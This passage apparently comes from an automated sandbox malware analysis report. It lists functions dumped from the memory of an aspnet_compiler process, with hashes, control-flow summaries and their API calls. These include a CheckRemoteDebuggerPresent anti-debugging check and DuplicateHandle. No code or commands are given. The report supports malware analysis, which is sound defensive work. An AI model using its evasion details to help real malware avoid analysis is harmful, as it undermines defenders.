                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: 48803d32b845ccd48e467a0ffc5907547c3460afae45e4897e80866832c5d87b
                            • Instruction ID: 9d1c8ee9e42082d25127b570c82cdf7fe747d170a16c9dbf50d98c852bb635bd
                            • Opcode Fuzzy Hash: 48803d32b845ccd48e467a0ffc5907547c3460afae45e4897e80866832c5d87b
                            • Instruction Fuzzy Hash: 032159B28002598FDB10CFAAD844BEEFBF4EF49320F14845AE458A7350D778A944CFA5
                            Function 02BB70A8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 809 2bb70a8-2bb712c CheckRemoteDebuggerPresent 811 2bb712e-2bb7134 809->811 812 2bb7135-2bb7170 809->812 811->812
                            APIs
                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02BB711F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2683391401.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_2bb0000_aspnet_compiler.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: bbe84095eb87ec163fb91816902bad5dfac8f946bdb871dde585c4abd273a521
                            • Instruction ID: 9023ce75c451a29fc23dc81468794b489e94f4aaf52478182ea563ab2b2f184c
                            • Opcode Fuzzy Hash: bbe84095eb87ec163fb91816902bad5dfac8f946bdb871dde585c4abd273a521
                            • Instruction Fuzzy Hash: 43213AB29002598FDB10CFAAD844BEEFBF4EF49320F14845AE455A7350D778A944CF65
                            Function 066198C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 815 66198c8-6619964 DuplicateHandle 816 6619966-661996c 815->816 817 661996d-661998a 815->817 816->817
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06619957
                            Memory Dump Source
                            • Source File: 00000006.00000002.2686704973.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6610000_aspnet_compiler.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: c402ff7a0658aed4e09de2793999b7627b31ea8b7e1186b273e39342ab5d2697
                            • Instruction ID: 1aeb62b0e0995ff90e822a5c2194dafcfce08e442fa5dc5218842ab4c6c3125e
                            • Opcode Fuzzy Hash: c402ff7a0658aed4e09de2793999b7627b31ea8b7e1186b273e39342ab5d2697
                            • Instruction Fuzzy Hash: 3821E5B5D002599FDB10CFAAD885ADEBBF9EB48720F14841AE914A7350D378A940CFA5
                            Function 066198D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 820 66198d0-6619964 DuplicateHandle 821 6619966-661996c 820->821 822 661996d-661998a 820->822 821->822
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06619957
                            Memory Dump Source
                            • Source File: 00000006.00000002.2686704973.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6610000_aspnet_compiler.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: e4d9954527e6c14ff5bf9591e6481dfe4120f70b12c8c09c0f00bde414461b18
                            • Instruction ID: e9f0b031973a9e3227bfb7e03108af91475c8a58961a28ab91c755beea811de9
                            • Opcode Fuzzy Hash: e4d9954527e6c14ff5bf9591e6481dfe4120f70b12c8c09c0f00bde414461b18
                            • Instruction Fuzzy Hash: 8621D8B5D002499FDB10CF9AD984ADEFBF9FB48710F14841AE914A7350D378A944CF65
                            Function 0106D01C Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2681868539.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_106d000_aspnet_compiler.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 95ffb865cfd344565f2a08c9cc5392dab10b79053b2acd35c30e32057116fd93
                            • Instruction ID: b554226f6ef8530b09360b6986f8e20a6c7d2f65528341f6d285edcd545aa978
                            • Opcode Fuzzy Hash: 95ffb865cfd344565f2a08c9cc5392dab10b79053b2acd35c30e32057116fd93
                            • Instruction Fuzzy Hash: 94210371604340DFEB15DF94D880B16BBA9FB84214F20C5A9E8C90B242C33AD407CB61
                            Function 0106D006 Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2681868539.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_106d000_aspnet_compiler.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 90be585ac81bbfe7f7c65031b78ead31b8f9a767d7db92e675f4b9b416fceace
                            • Instruction ID: 7e6beb82471d975b976d0eda31f876aafc39a434f681a0811ca3421fbf21e5a5
                            • Opcode Fuzzy Hash: 90be585ac81bbfe7f7c65031b78ead31b8f9a767d7db92e675f4b9b416fceace
                            • Instruction Fuzzy Hash: 972195755093808FD713CF64D594715BFB1EB46214F28C5DAD8898F667C33A980ACB62